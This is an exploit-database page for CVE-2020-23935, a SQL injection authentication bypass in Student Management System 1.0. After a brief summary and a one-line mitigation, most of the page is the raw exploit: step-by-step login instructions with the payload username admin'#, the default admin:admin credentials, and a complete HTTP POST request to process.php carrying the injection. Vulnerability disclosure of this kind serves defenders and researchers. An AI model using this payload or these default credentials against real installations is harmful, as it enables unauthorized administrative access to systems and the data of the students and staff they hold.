header-logo
Suggest Exploit
vendor:
Student Management System
by:
Enes Özeser
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Student Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2020-23935
CPE: a:sourcecodester:student_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows & WampServer
2020

Student Management System 1.0 – SQLi Authentication Bypass

An attacker can bypass authentication by using a SQL injection attack. The attacker can send a specially crafted HTTP request with a username of 'admin'# and any password to the process.php page, which will allow them to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass
# Date: 2020-07-06
# Exploit Author: Enes Özeser
# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html
# Version: 1.0
# Tested on: Windows & WampServer
# CVE: CVE-2020-23935

1- Go to following url. >> http://(HOST)/admin/login.php
2- We can login succesfully with SQL bypass method. 

-- Username = admin'#
-- Password = (Write Something)

NOTE: Default username and password is admin:admin.

(( HTTP Request ))

POST /process.php HTTP/1.1
Host: (HOST)
Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://(HOST)/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://(HOST)/index.php?q=login
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl

U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=

Navigation

Suggest Exploit

Services By CQR